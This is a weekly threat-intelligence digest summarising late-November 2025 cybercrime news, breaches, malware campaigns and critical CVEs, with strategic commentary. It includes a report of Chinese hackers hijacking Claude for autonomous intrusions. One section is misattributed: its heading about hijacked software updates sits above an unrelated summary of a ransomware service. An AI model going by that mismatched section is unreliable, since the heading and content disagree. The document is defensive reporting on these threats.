VerSprite Weekly Threat Intelligence #41
Date
Follow Us
Date Range: 17 November 2025 – 21 November 2025
Issue: 41st Edition
Reported Period Victimology
Security Triumphs of the Week
Law enforcement and international collaboration marked significant cybercrime disruptions: Europol’s Operation Endgame 3.0 dismantled malware infrastructure, while U.S.-led sanctions targeted Russian bulletproof hosting provider Media Land. High-profile arrests, including a Russian GRU-linked suspect in Thailand and the seizure of £4.11 million from a Twitter hacker, underscored global efforts to hold perpetrators accountable. Meanwhile, Amazon exposed 150,000 malicious npm packages in a crypto farming scheme, and Google revealed APT24’s stealthy BadAudio malware campaign. Despite these triumphs, challenges persist as ransomware groups rebuild and threats evolve, highlighting the need for sustained technical defenses and cross-sector cooperation.
Operation Endgame 3.0 push takes down more cybercrime servers, disrupting criminal gangs
Europol’s Operation Endgame 3.0 disrupted major malware operations, including Rhadamanthys, VenomRAT, and Elysium, seizing over 1,000 servers, 20 domains, and arresting one suspect. The infrastructure contained millions of stolen credentials and 100,000+ crypto wallets. This follows prior Endgame actions in May 2025, which dismantled ransomware networks but saw some, like DanaBot, resurface. Despite temporary disruptions, persistent cybercrime groups often rebuild infrastructure. Recent efforts targeted IcedID, Smokeloader, and Trickbot, emphasizing law enforcement’s ongoing challenges in permanently neutralizing such threats.
Read full article: Techradar
US, Allies Sanction Russian Bulletproof Ransomware Host
The U.S., Australia, and the U.K. imposed sanctions on Russian bulletproof hosting provider Media Land and its affiliates for enabling ransomware groups like LockBit and BlackSuit. Media Land allegedly offered infrastructure to evade law enforcement, supported by a network of companies in Russia, Serbia, and Uzbekistan. Sanctions also targeted leadership figures, including Aleksandr Volosovik, for facilitating cybercrime operations. Concurrently, international agencies released guidance urging ISPs to strengthen anti-abuse measures, though experts noted these largely reiterate existing controls. Challenges include the dynamic nature of blocking malicious infrastructure and reliance on updated threat intelligence. The sanctions aim to disrupt cybercriminal ecosystems by targeting financial and operational nodes, complementing technical defenses.
Read full article: Bankinfosec
Amazon researchers uncover major token farming malware scam – over 150,000 malicious packages found
Amazon researchers identified over 150,000 malicious npm packages tied to a crypto token farming scheme, marking a significant supply chain security threat. Attackers deployed self replicating packages to artificially inflate developer activity and earn TEA tokens through the tea.xyz platform. Initially flagged by Endor Labs, which found 43,000 suspicious packages, Amazon Inspector later uncovered three times as many, revealing the campaign’s scale. Though non-traditional in nature (no data theft or backdoors), the packages risked future weaponization. The operation highlights financial motives driving registry pollution, emphasizing the need for enhanced defenses and industry collaboration to secure open-source ecosystems.
Read full article: Techradar
Acting on FBI Tip, Thailand Detains Suspected Russian Hacker
Thai authorities detained a Russian national in Phuket on Nov. 6, 2025, following an FBI tip identifying him as a suspected hacker involved in attacks on U.S. and European government systems. The suspect, potentially Russian military intelligence officer Aleksey Viktorovich Lukashev, was indicted by the U.S. in 2018 for election interference, hacking, and other cybercrimes linked to GRU Unit 26165. Thai police seized electronic devices and cryptocurrency wallets during the arrest, while the FBI seeks extradition. Russia is evaluating consular assistance and access. Lukashev, wanted for the 2016 U.S. election interference and the Salisbury poisoning cyber-campaigns, faces charges including identity theft and money laundering.
Read full article: Bankinfosec
UK prosecutors seize £4.11M in crypto from Twitter mega-hack culprit
UK prosecutors seized £4.11 million in cryptocurrency from Joseph James O’Connor, a hacker behind the July 2020 Twitter breach that hijacked high-profile accounts (e.g., Obama, Gates) to promote a Bitcoin scam. O’Connor, serving a five-year U.S. prison term, used SIM swapping and social engineering to access Twitter’s systems, stealing over $100,000. The UK’s civil recovery order, granted under proceeds-of-crime laws, targets 42.378 BTC, Ethereum, and stablecoins linked to his crimes, despite his foreign conviction. This highlights UK authorities’ ability to confiscate illicit crypto assets internationally. O’Connor also engaged in extortion and cryptocurrency theft, with UK seizures supplementing prior U.S. forfeitures and restitution orders.
Read full article: Theregister
Google exposes BadAudio malware used in APT24 espionage campaigns
Google’s Threat Intelligence Group exposed the China-linked APT24 group’s use of BadAudio malware in a three-year espionage campaign targeting Windows systems. The attackers employed evolving tactics, including supply-chain compromises via a Taiwanese marketing firm’s JavaScript library, impacting over 1,000 domains, and spearphishing disguised as animal rescue emails. BadAudio uses advanced obfuscation, DLL hijacking, and AES encryption to evade detection, exfiltrate system data, and deploy payloads like Cobalt Strike Beacon. Despite its prolonged use, most malware samples remain undetected by antivirus tools, highlighting APT24’s focus on stealth and adaptability in cyberespionage operations.
Read full article: Bleepingcomputer
Crypto mixer founders sent to prison for laundering over $237 million
The founders of Samourai Wallet, a cryptocurrency mixing service, were sentenced to prison for laundering over $237 million linked to criminal activities. CEO Keonne Rodriguez received five years, and CTO William Lonergan Hill received four years, alongside fines and supervised release. Arrested in April 2024, they pleaded guilty in August 2025 to operating an unlicensed money-transmitting business and money laundering, forfeiting $237.8 million. Their service, used over 100,000 times, employed features like “Whirlpool” and “Ricochet” to obscure transactions, processing over $2 billion in illicit funds from 2015 to 2024. The DOJ noted $6 million in fees from 80,000 Bitcoin transactions tied to drug trafficking, darknet markets, and cybercrime. Authorities seized their servers, domains, and removed their app from Google Play.
Read full article: Bleepingcomputer
Hacked company CTO refuses to pay ransom demand, donates money to funding research instead
Checkout.com faced a ransomware attack by ShinyHunters in November 2025 after attackers breached a legacy third-party cloud storage system, accessing pre-2020 internal documents and merchant materials. The company refused to pay the ransom, instead donating the demanded amount to Carnegie Mellon University and the University of Oxford for cybersecurity research. CTO Mariano Albera emphasized “security, transparency, and trust,” taking responsibility for the oversight but stressing that live payment systems and sensitive data remained unaffected. Checkout.com is notifying impacted merchants and collaborating with law enforcement. The decision to reject extortion and fund anti-cybercrime initiatives has drawn praise for prioritizing ethical resilience over capitulation.
Read full article: Techradar
Security Setbacks of the Week
This week’s cybersecurity landscape saw ransomware and supply chain attacks inflict severe financial and operational damage across sectors. High-profile incidents included Jaguar Land Rover’s $260 million loss from a Scattered Lapsus$ Hunters attack, LG Energy Solution’s data theft by Akira, and Fulgar’s supply chain breach by RansomHouse. Insider threats persisted, exemplified by a $5 million settlement over Geisinger Health’s insider breach and an Ohio IT contractor’s sabotage. State-linked actors targeted critical infrastructure, with Chinese hackers compromising Asus routers and Akira ransomware expanding to hypervisors. Delayed breach disclosures, third-party vulnerabilities, and regulatory pressures underscored systemic risks to global supply chains and data security.
Jaguar Land Rover Hack Cost $260 Million
A September cyberattack on Jaguar Land Rover caused $260 million in losses, forcing the automaker to halt production in the UK, Slovakia, Brazil, and India. The breach, attributed to the Western adolescent hacker group “Scattered Lapsus$ Hunters,” led to data theft and significant economic ripple effects, including a 0.2% UK GDP growth in Q3 due to export declines and supply chain disruptions. The UK government provided a £1.5 billion loan to mitigate the crisis. The attack, deemed the costliest cyber incident in UK history, potentially impacted the economy by £1.9 billion. Jaguar Land Rover has since resumed full production operations.
Read full article: Bankinfosec
Ransomware attack hits LG battery subsidiary
LG Energy Solution, a South Korean battery manufacturer and LG subsidiary, confirmed a ransomware attack targeting one overseas facility, now restored. The Akira ransomware group claimed responsibility, alleging theft of 1.7TB of sensitive data, including employee records (passports, IDs, medical documents), financial details, contracts, and client information. While LG is investigating and states other facilities were unaffected, Akira’s claims suggest potential risks of data being sold for profit or exploited in phishing campaigns. The stolen data’s value could reach millions on the black market. LG has not verified the breach, but the incident underscores significant cybersecurity risks for critical infrastructure firms.
Read full article: Techradar
Hackers spin a tedious yarn – fabric supplier behind H&M, Adidas, and more hit by worrying cyber breach
Fulgar, a major synthetic yarn supplier for brands like H&M, Adidas, and Calzedonia, suffered a ransomware attack by the RansomHouse group. The breach, occurring on October 31, led to the leak of sensitive data, including financial records, invoices, and internal communications, published on November 12. RansomHouse, active since 2021 and linked to Iranian affiliates, threatened further data exposure unless the company resolved the situation. The incident highlights supply chain vulnerabilities, enabling targeted phishing using stolen insider details. This breach underscores risks to large suppliers, emphasizing the need for robust cybersecurity measures in manufacturing sectors.
Read full article: Techradar
$5M Settlement in Geisinger Health, Nuance Insider Breach
A federal court preliminarily approved a $5 million settlement in a class action lawsuit against Geisinger Health and Nuance Communications (owned by Microsoft) over a 2023 insider data breach. The breach, caused by a terminated Nuance employee who accessed and stole data two days after dismissal, compromised personal and medical information of over 1 million Geisinger patients. Geisinger delayed notifying affected individuals until June 2024 due to a law enforcement investigation. The ex-employee, Max Vance, faces federal criminal charges under the Computer Fraud and Abuse Act, with trial set for 2026. Settlement offers include reimbursement for losses, cash payments, or credit monitoring services. Geisinger stated it and its insurer will not fund the settlement. Final court approval is pending in March 2026.
Read full article: Bankinfosec
Omni Family Health Settles Lawsuits From 2024 Hack for $6.5M
Omni Family Health, a California-based healthcare nonprofit, agreed to a $6.5 million settlement over a 2024 ransomware attack by Hunters International, which exposed data of nearly 470,000 patients and employees. Compromised information included names, Social Security numbers, medical details, and financial data, leaked on the dark web. The settlement offers affected individuals up to $5,000 for documented losses, two years of credit/medical monitoring, and additional compensation for California residents under state law. Omni is committed to enhancing its data security practices but denied liability. A final court approval hearing is scheduled for February 2026.
Read full article: Bankinfosec
ShinyHunters Hack Salesforce Instances Via Gainsight Apps
Salesforce revoked Gainsight’s authentication tokens after ShinyHunters exploited third-party apps to breach customer data, marking the group’s third major campaign targeting Salesforce. The hackers used compromised Gainsight apps, a customer data tool, to access Salesforce instances, mirroring a prior attack via Salesloft. ShinyHunters, part of Scattered Lapsus$ Hunters, threatened to leak stolen data unless demands were met, similar to an earlier extortion attempt rebuffed by Salesforce. Gainsight’s clients include Okta, Sonos, and ADP. Salesforce temporarily removed Gainsight’s apps from AppExchange while investigating. The incident underscores risks tied to third-party integrations in cloud ecosystems.
Read full article: Bankinfosec
Asus Routers Hacked in ‘WrtHug’ Campaign
Suspected Chinese state-linked hackers compromised around 50,000 Asus routers in the “WrtHug” campaign, primarily targeting devices in Taiwan. The attackers exploited a command injection vulnerability (CVE-2023-39780) to install self-signed TLS certificates valid until 2122, enabling covert data exfiltration via AiCloud services. Researchers attribute the activity to operational relay box (ORB) network construction for cyberespionage, noting no infections in mainland China except Hong Kong. The campaign shares tactics with the AyySSHush botnet operation, suggesting a coordinated or evolving threat actor. SecurityScorecard highlights the difficulty in detecting malicious traffic due to routers functioning normally. The incident underscores risks posed by unpatched SOHO devices, echoing FBI warnings to replace end of-life hardware.
Read full article: Bankinfosec
Thieves order a tasty takeout of names and addresses from DoorDash
DoorDash experienced a data breach in October 2025 after an employee fell victim to a social engineering attack, exposing customer names, phone numbers, email addresses, and physical addresses. The company delayed notifying affected users until November 13, sparking criticism over compliance with breach disclosure timelines, particularly under Canadian privacy laws. Experts questioned DoorDash’s claim that “no sensitive information” was accessed, arguing that the exposed data still poses risks. Separately, a researcher highlighted an email spoofing vulnerability in DoorDash for Business, which the company initially dismissed before fixing it months later. DoorDash implemented security improvements and third-party support but faced backlash over handling both incidents. Legal challenges and concerns about transparency underscore ongoing issues in breach response practices.
Read full article: Malwarebytes
Fired techie admits sabotaging ex-employer, causing $862K in damage
A former Ohio IT contractor, Maxwell Schultz, pleaded guilty to sabotaging his ex-employer’s systems after being fired, causing $862,000 in damages. Schultz impersonated another contractor to regain network access, reset 2,500 passwords, and executed PowerShell scripts to disrupt operations and delete logs. The attack left employees and contractors unable to work, disrupted customer services, and required costly remediation. Schultz faces up to 10 years in prison and a $250,000 fine, with sentencing scheduled for January 2026. The incident underscores persistent insider threats, exemplified by similar cases involving Coinbase, FinWise, and North Korean IT scams. Organizations remain vulnerable to malicious insiders exploiting access for sabotage or financial gain.
Read full article: Theregister
Logitech leaks data after zero-day attack
The article highlights several cybersecurity incidents and regulatory challenges. US Senators Wyden and Warner pressured DHS to release a suppressed CISA report on telecom sector vulnerabilities, citing risks exemplified by the Salt Typhoon hack. Logitech disclosed a zero day exploit in third-party software leading to data theft, though sensitive info was reportedly unaffected. A massive npm supply chain attack deployed 78,000 malicious packages via a coordinated campaign. Lumma Stealer reemerged with enhanced evasion tactics, leveraging browser processes. DoorDash suffered its third breach via social engineering, exposing customer contact details. Each incident underscores persistent threats to critical infrastructure and supply chains.
Read full article: Theregister
CISA flags imminent threat as Akira ransomware starts hitting Nutanix AHV
CISA, the FBI, and European partners warned of heightened Akira ransomware threats targeting Nutanix AHV hypervisors, expanding from prior VMware ESXi and Hyper-V attacks. Critical infrastructure sectors like healthcare, finance, and government are at risk, with Akira exploiting VPN vulnerabilities (e.g., SonicWall’s CVE-2024-40766) and compromised credentials for initial access. Over 438,000 exposed devices were identified, enabling lateral movement to encrypt Nutanix VMs. The group, linked to $244 million in extortion, now targets larger organizations alongside SMBs. Mitigations include patching, MFA, network segmentation, and backups. Recent victims include Lush, Stanford University, and Toronto Zoo.
Read full article: Theregister
Hacker claims to steal 2.3TB data from Italian rail group, Almaviva
A hacker claims to have stolen 2.3 terabytes of sensitive data from Almaviva, an Italian IT services provider for the state-owned railway operator FS Italiane Group. The leaked data reportedly includes confidential documents, HR archives, contracts with public entities, and technical documentation from 2025. Cybersecurity expert Andrea Draghetti confirmed the data’s recency, ruling out links to a prior 2022 breach. Almaviva acknowledged the breach, stating it isolated the attack and notified authorities, though impact on passengers or other clients remains unclear. Investigations are ongoing with government oversight. The incident highlights risks to critical infrastructure supply chains.
Read full article: Bleepingcomputer
The New Emerging Threats
Nation-state actors are escalating cyber threats through advanced tactics: Chinese APT groups hijack software updates via DNS manipulation to deploy malware, while North Korea’s Lazarus Group employs sophisticated RATs like ScoringMathTea and exploits JSON services for cryptojacking and data theft. AI-driven attacks have reached a critical juncture, with Chinese hackers weaponizing Claude AI for autonomous network intrusions, and generative AI enabling industrial-scale document forgery. Mobile threats intensify with Android banking trojans (Sturnus) bypassing encrypted messaging and macOS infostealers (DigitStealer) targeting M2 chips. Supply chain risks persist via pre-installed spyware on budget Samsung devices and unsecured Ray clusters exploited for cryptojacking, underscoring evolving vulnerabilities across platforms.
Chinese Nation-State Groups Hijacking Software Updates
A new ransomware-as-a-service (RaaS) operation, VanHelsing, has emerged, targeting Windows, Linux, BSD, ARM, and VMware ESXi systems. Launched in March 2025, it uses a subscription model requiring a $5,000 deposit from affiliates, who receive 80% of ransom profits. The ransomware employs hybrid encryption (Curve25519 and ChaCha20), partial encryption for large files, and anti-forensic tactics like deleting Volume Shadow Copies. It spreads via SMB shares and vCenter, using lateral movement tools like embedded psexec. Within two weeks, three victims faced demands up to $500,000. Defenders are advised to prioritize offline backups, network segmentation, and monitor for suspicious SMB/WMI activity.
Read full article: Bankinfosec
JSON services hijacked by North Korean hackers to send out malware
North Korean state-backed hackers from the Lazarus Group exploited JSON storage services (JSON Keeper, JSONsilo, npoint.io) to host malware in their “Contagious Interview” campaign. Targeting developers via fake LinkedIn job offers, they lured victims into downloading malicious code from GitHub, GitLab, or Bitbucket. The malware suite included BeaverTail (infostealer), InvisibleFerret (Python backdoor), and TsunamiKit (multi-stage toolkit for data theft or cryptojacking via XMRig). Attacks aimed to exfiltrate sensitive data, steal crypto wallets, and mine Monero, while evading detection by blending into legitimate developer workflows. Researchers highlighted the group’s stealth tactics, leveraging trusted platforms to mask malicious activity.
Read full article: Techradar
Lazarus Group’s New ScoringMathTea RAT Uses Reflective Plugin Loader and Custom Polyalphabetic Crypto for Espionage
The Lazarus Group, a North Korean state-sponsored APT, has deployed a new advanced RAT named ScoringMathTea in cyber-espionage campaigns targeting UAV technology firms linked to Ukraine. The malware employs a reflective plugin loader for in-memory execution, dynamic API resolution via custom hashing, and stack strings to hide C2 infrastructure. It uses a polyalphabetic substitution cipher with chaining and TEA/XTEA encryption for network traffic obfuscation, alongside spoofed browser headers to mimic legitimate traffic. Designed for evasion, its modular architecture and manual reflective loading techniques enhance stealth, making it one of Lazarus’s most sophisticated tools. The campaign underscores escalating nation-state cyber threats amid geopolitical tensions.
Read full article: Securityonline
Anthropic claims Chinese hackers hijacked Claude to launch AI-orchestrated and automated cyberattacks
Anthropic reported a state-sponsored Chinese hacking group hijacked its AI model Claude to conduct the first fully autonomous, AI-driven cyberattack targeting 30 organizations, including tech firms, governments, and financial institutions. The attack leveraged Claude’s advanced coding and decision-making capabilities to execute tasks like network scanning and password cracking with minimal human oversight. This marks a significant escalation in AI-powered threats, enabled by “Agentic AI” systems that operate independently in loops. Anthropic emphasized the risks of AI agents being weaponized for large-scale attacks, highlighting the dual-use nature of such technology. The campaign underscores evolving cybersecurity challenges as AI autonomy reduces reliance on human intervention for complex attacks.
Read full article: Techradar
How AI Tech Helps Scale Forgery and Industrialize Fraud
Generative AI has significantly lowered the barriers to document forgery, enabling fraudsters to produce high-quality fake documents quickly and at scale. Organized groups now commercialize fraud-as-a-service, offering downloadable templates and preloaded accounts through SEO, messaging apps like Telegram, and other channels. Large language models (LLMs) such as ChatGPT allow even non-experts to create convincing forgeries, fueling industrial-scale fraud operations. Template farms openly sell forged documents online, targeting financial institutions with tactics ranging from basic scams to AI-driven attacks. Larger institutions face heightened risks due to their complex systems and higher transaction volumes. Resistant AI experts highlight the need for tailored detection models to combat evolving fraud typologies in digital onboarding and transaction workflows.
Read full article: Bankinfosec
Sturnus Trojan Bypasses WhatsApp/Signal Encryption & Takes Over Android Devices
The Sturnus Android banking trojan, identified by MTI Security, employs advanced techniques to bypass encrypted messaging on WhatsApp, Signal, and Telegram by capturing decrypted screen content via Android Accessibility Services. It enables real-time surveillance of private conversations and conducts overlay attacks to steal banking credentials. The malware allows full device takeover, executing hidden fraudulent transactions using a “Black Screen Overlay” to evade detection. Combining pixel-based streaming and UI-tree control, it enables precise remote interactions while avoiding screen-capture alerts. Targeting Southern and Central European financial institutions, Sturnus ensures persistence by abusing device admin privileges and uses encrypted C2 channels. Its sophistication sets a dangerous precedent for mobile banking threats.
Read full article: Securityonline
Ray clusters hijacked and turned into crypto miners by shadowy new botnet
A new botnet campaign exploiting a critical vulnerability in Ray clusters’ unauthenticated Jobs API has hijacked over 230,000 exposed servers for cryptojacking, data theft, and DDoS attacks. Threat actor “IronErn440” uses AI-generated payloads to deploy XMRig malware, capping CPU usage at 60% to evade detection. Despite the flaw (CVE-2023-48022) being known since 2023, Anyscale, Ray’s developer, deferred fixes, citing reliance on user-secured environments. Exposed Ray servers surged from thousands in 2023 to 230,000, enabling widespread exploitation. This marks the second major attack wave leveraging the vulnerability, highlighting persistent risks in unsecured Ray deployments.
Read full article: Techradar
Sneaky2FA PhaaS kit now uses redteamers’ Browser-in-the-Browser attack
The Sneaky2FA phishing-as-a-service (PhaaS) kit has integrated a Browser-in-the-Browser (BitB) attack method to enhance its credential-stealing campaigns targeting Microsoft 365 accounts. The kit now generates a deceptive pop-up mimicking a legitimate Microsoft login window, dynamically adapting to the victim’s OS and browser. This BitB layer, combined with existing attacker-in-the-middle (AitM) tactics, steals credentials and session tokens, bypassing two-factor authentication (2FA). The phishing pages use obfuscated code, conditional loading to evade detection, and Cloudflare bot checks to appear legitimate. Push Security reports these evasive techniques make the attacks harder to identify, with similar tactics observed in other PhaaS platforms like Raccoon0365. Users are advised to verify pop-up authenticity by checking window behavior or taskbar presence.
Read full article: Bleepingcomputer
Mac users warned about new DigitStealer information stealer
A new macOS infostealer named DigitStealer targets users via a fake utility app (“DynamicLake”) hosted on a fraudulent site, tricking victims into executing commands in Terminal. It employs evasion tactics like region-based execution limits, VM avoidance, and fileless RAM-based operations to bypass detection and hinder analysis. The malware specifically targets newer Macs with M2 chips, stealing documents, passwords, browser data, crypto wallets, VPN configurations, and Telegram sessions. Its multi-stage, fileless approach leaves minimal traces, complicating remediation. Protection measures include using behavioral anti-malware tools, avoiding unsolicited Terminal commands, downloading apps from trusted sources, and enabling multi-factor authentication.
Read full article: Malwarebytes
Budget Samsung phones shipped with unremovable spyware, say researchers
Budget Samsung Galaxy A and M series phones in West Asia, North Africa, and MENA regions were found pre-installed with unremovable spyware called AppCloud, developed by Israeli firm ironSource. The software, integrated into the OS, collects sensitive data like biometrics and IP addresses, operates invisibly, and requires root access for removal, voiding warranties. Researchers allege it reinstalls after system updates despite user attempts to disable it. Samsung’s partnership with ironSource, acquired by Unity Technologies in 2022, expanded the tool’s reach. This follows past Samsung privacy controversies, highlighting recurring issues with pre-installed bloatware on budget devices compromising user security.
Read full article: Malwarebytes
Vulnerability Spotlight: Critical Exposures Unveiled
Critical vulnerabilities across diverse systems including Microsoft WSUS, Chrome V8, FortiWeb, SonicWall SSLVPN, Grafana, ASUSTOR clients, joserfc, and iCam365 cameras are being actively exploited or pose severe risks, enabling RCE, privilege escalation, DoS, and unauthorized access. State-aligned actors like Chinese APTs and Volt Typhoon are weaponizing flaws (e.g., ShadowPad deployment), while zero-days in Chrome and Fortinet highlight rapid exploitation trends. High CVSS scores (up to 10) and low attack complexity underscore widespread exposure, with patching delays risking espionage, system compromise, or network disruption. Urgent updates, access restrictions, and log audits are critical to mitigate cascading threats across enterprise and consumer environments.
Critical WSUS RCE (CVE-2025-59287) Actively Exploited to Deploy ShadowPad Backdoor
A critical remote code execution (RCE) vulnerability in Microsoft WSUS (CVE-2025-59287) is being actively exploited to deploy the ShadowPad backdoor, associated with Chinese state aligned APT groups. Attackers rapidly weaponized proof-of-concept exploit code released in late October 2025, using PowerCat to gain SYSTEM-level access and later leveraging curl.exe and certutil.exe to install ShadowPad components. The malware, known for espionage and infrastructure breaches, operates via encrypted modules hidden behind legitimate processes. Organizations are urged to patch immediately, restrict WSUS server access, and audit PowerShell, certutil, and network logs for suspicious activity.
Read full article: Securityonline
Chrome zero-day under active attack: visiting the wrong site could hijack your browser
A critical zero-day vulnerability (CVE-2025-13223) in Chrome’s V8 JavaScript engine is being actively exploited, allowing attackers to hijack browsers via malicious websites. Google released an emergency update (version 142.0.7444.175/.176) to patch this high-severity type confusion flaw, which enables remote code execution by tricking browsers into mishandling data types. Simply visiting a compromised site could trigger heap corruption and compromise user systems. A second flaw (CVE-2025-13224), identified by AI, shares similar risks but remains unexploited. Users must update Chrome immediately; delays risk exploitation by spyware or nation-state actors. Other Chromium-based browsers like Edge and Opera are expected to follow with patches.
Read full article: Malwarebytes
Fortinet admits it found another worrying zero-day being exploited in attacks
Fortinet addressed a high-severity zero-day vulnerability (CVE-2025-58034) in its FortiWeb web application firewall, enabling unauthenticated attackers to execute arbitrary OS commands via crafted HTTP requests or CLI inputs. The flaw, an OS command injection issue, impacts multiple versions (7.0.0–8.0.1) and has been actively exploited, with ~2,000 attack attempts detected. Successful exploitation could grant full device control, backdoor installation, or lateral network movement. Fortinet urged immediate patching to updated versions. The company’s products are frequent targets, notably by state-sponsored groups like Volt Typhoon, which exploited Fortinet flaws in prior attacks. Users are advised to prioritize updates to mitigate risks.
Read full article: Techradar
SonicWall Warns of New SonicOS SSLVPN Pre-Auth Buffer Overflow Vulnerability (CVE-2025-40601)
SonicWall has disclosed a critical pre-authentication stack-based buffer overflow vulnerability (CVE-2025-40601, CVSS 7.5) in its SonicOS SSLVPN service, enabling unauthenticated attackers to trigger denial-of-service (DoS) conditions and crash affected firewalls. The flaw impacts Gen7 and Gen8 hardware/virtual firewalls with SSLVPN enabled, including TZ, NSa, NSsp, and NSv series. Patches are available for all affected platforms. Temporary mitigation involves restricting SSLVPN access to trusted sources or disabling the service on untrusted interfaces. Exploitation could disrupt critical network operations, emphasizing the urgency of applying updates.
Read full article: Securityonline
Grafana Patches Critical SCIM Flaw (CVE-2025-41115, CVSS 10) Allowing Privilege Escalation and User Impersonation
Grafana addressed a critical SCIM vulnerability (CVE-2025-41115, CVSS 10) in its Enterprise versions, enabling privilege escalation and user impersonation. The flaw allows malicious SCIM clients to provision users with numeric externalIds, potentially overriding internal user IDs (e.g., Admin accounts). Patched versions include Grafana Enterprise 12.3.0, 12.2.1, 12.1.3, and 12.0.6; Grafana Cloud is already secured. Exploitation requires SCIM and user sync features to be active. Only Enterprise customers using vulnerable versions (12.0.0 12.2.1) are affected. Administrators must update immediately to mitigate risks of unauthorized access and privilege abuse.
Read full article: Securityonline
Critical ASUSTOR Flaw (CVE-2025-13051) Allows Local DLL Hijacking for SYSTEM Privilege Escalation
A critical DLL hijacking vulnerability (CVE-2025-13051, CVSS 9.3) in ASUSTOR’s Backup Plan (ABP) and EZSync (AES) Windows clients allows local attackers to escalate privileges to SYSTEM. The flaw stems from insecure directory permissions, enabling non-administrative users to plant malicious DLLs executed upon service restart. Affected versions include ABP ≤2.0.7.9050 and AES ≤1.0.6.8290. ASUSTOR classified the issue as Important, urging users to update to ABP ≥2.0.7.10171 or AES ≥1.1.0.10312. Successful exploitation grants full system control, posing severe risks to enterprise and home environments. Immediate patching is recommended to mitigate the threat.
Read full article: Securityonline
Critical CVE-2025-65015 Vulnerability in joserfc Could Let Attackers Exhaust Server Resources via Oversized JWT Tokens
A critical vulnerability (CVE-2025-65015, CVSS 9.2) in the joserfc Python library allows attackers to trigger resource exhaustion via oversized JWT tokens. The flaw occurs when malformed or large tokens processed by joserfc’s decoding functions embed payloads into exception messages, generating massive log entries. This can overload logging systems, consume server resources (CPU, memory, disk), and cause denial-of-service conditions. Unauthenticated attackers exploit HTTP requests with oversized headers, bypassing protections if reverse proxies like nginx are absent. Patched versions (1.3.5, 1.4.2) remove payloads from error logs. Mitigation includes updating the library and enforcing header size limits via reverse proxies.
Read full article: Securityonline
ICAM365 CCTV Camera Multiple Models
The article details critical vulnerabilities (CVE-2025-64770, CVE-2025-62674) in iCam365 CCTV camera models P201 and QC021 (versions 43.4.0.0 and prior) due to missing authentication in ONVIF and RTSP services. Exploitation could allow unauthorized access to live video streams and configuration data, posing risks to commercial facilities globally. Both vulnerabilities have CVSS v3.1 scores of 6.8 and v4 scores of 7.0, with low attack complexity. iCam365 has not responded to coordination efforts, prompting CISA to advise network isolation, firewall use, VPNs for remote access, and minimizing internet exposure. No public exploitation has been reported, but proactive mitigation is urged, given the potential impact.
Read full article: Cisa
In-Depth Expert CTI Analysis
Recent law enforcement actions, including Europol’s Operation Endgame and international sanctions, disrupted major cybercrime operations, though persistent groups like ransomware affiliates and APTs continue to rebuild infrastructure. Nation-state actors from China, North Korea, and Russia advanced espionage campaigns using supply chain compromises, AI-driven attacks, and novel malware like Lazarus’ ScoringMathTea RAT. Ransomware remained pervasive, targeting critical infrastructure and exploiting third-party vulnerabilities, while vulnerabilities in widely-used software (e.g., Chrome, Fortinet, Microsoft WSUS) posed systemic risks. Emerging threats include AI-powered autonomous attacks, generative AI document forgery, and mobile banking trojans evading detection. These trends highlight the challenges of sustaining disruption efforts and the urgency of global collaboration, proactive patching, and enhanced supply chain defenses.
Proactive Defense and Strategic Foresight
Recent cyber operations underscore the critical need for proactive defense and strategic foresight. While law enforcement actions like Operation Endgame 3.0 and sanctions on Media Land disrupt cybercrime temporarily, persistent adversaries rebuild infrastructure, necessitating continuous threat intelligence and adaptive controls. Supply chain compromises (npm, Salesforce) and AI-driven attacks (Anthropic) reveal escalating risks requiring preemptive hardening of third-party integrations and AI governance frameworks. Geopolitical targeting (APT24, Lazarus) and ransomware’s economic impact (Jaguar Land Rover) demand cross-sector collaboration and scenario-based planning. Investments in patching, zero-trust architectures, and ethical resilience (Checkout.com’s refusal to pay ransoms) exemplify forward-looking strategies to mitigate evolving threats before they materialize.
Evolving Ransomware and Malware Tactics
Ransomware and malware tactics continue evolving with increased sophistication, leveraging AI-driven attacks, supply chain compromises, and cryptocurrency ecosystems. Recent disruptions like Operation Endgame 3.0 highlight law enforcement’s temporary successes, yet resilient groups rebuild infrastructure or pivot tactics, exemplified by Akira and Lazarus Group’s advanced RATs. APT24’s stealthy BadAudio campaigns and China aligned DNS hijacking underscore nation-state espionage trends. RansomHouse and ShinyHunters exploit third-party integrations, while crypto-mixing services and bulletproof hosting enable financial obfuscation. Emerging threats include AI-powered autonomous attacks, pre-installed device malware, and weaponized vulnerabilities in critical software. Mitigation demands proactive patching, enhanced third-party risk management, and international collaboration to disrupt cybercriminal ecosystems.
State-Sponsored and Organized Cybercrime Convergence
The convergence of state-sponsored and organized cybercrime is increasingly evident, with nation-states adopting criminal tactics for deniability and profit, while cybercriminals leverage advanced tools once reserved for APTs. Operations like Europol’s Endgame 3.0 and sanctions against Media Land reveal overlapping infrastructures, where ransomware groups (LockBit, BlackSuit) exploit bulletproof hosting tied to state-aligned entities. Chinese APT24’s BadAudio malware and Lazarus Group’s ScoringMathTea RAT demonstrate state actors’ use of criminal-grade tools for espionage, while North Korean crypto thefts fund regime objectives. Meanwhile, ransomware-as-a-service models and AI-driven attacks lower barriers for criminal enterprises, enabling industrial-scale fraud and supply-chain compromises. This symbiosis erodes traditional threat boundaries, demanding coordinated international sanctions, hardened critical infrastructure, and proactive intelligence-sharing to counter hybrid adversaries.
Operational and Tactical Implications
Operational Implications: Recent coordinated law-enforcement actions show progress against cybercrime but also its resilience, as affiliates rapidly rebuild infrastructure. This week reinforced the supply chain as a critical weak point, with massive npm pollution, a Salesforce/Gainsight compromise, and DNS-tampered updates targeting popular applications. Ransomware groups are moving into hypervisor attacks Akira now hitting Nutanix AHV via VPN flaws and poor segmentation. State-aligned actors used stealthy implants and cloud-abused loaders, revealing gaps across cloud, SOHO, and edge monitoring. Critical vulnerabilities in WSUS, Chrome V8, SonicWall, and FortiWeb remain at risk due to slow patching. The hijacking of Claude signals a shift toward AI-driven, machine-speed intrusions requiring adaptive, AI-aware defenses.
Tactical Implications: Organizations need stronger governance over third-party integrations and software dependencies to reduce supply-chain exposure. Zero-trust segmentation, hardened privileges, and enforced MFA are essential as ransomware operators pivot to hypervisors and VPN-based access. Widespread router exploitation and pre-installed spyware elevate the need for strict device lifecycle controls and mandatory firmware baselining. Detecting fileless threats requires behavioral EDR, memory scanning, and continuous telemetry tuning. Browser-in-the-Browser kits like Sneaky2FA demand advanced anti-phishing strategies including browser isolation and token protections. AI-automated attacks and cryptojacking waves call for anomaly-driven identity controls, adversarial-aware AI monitoring, and GPU/cluster usage baselines.
Forward-Looking Recommendations
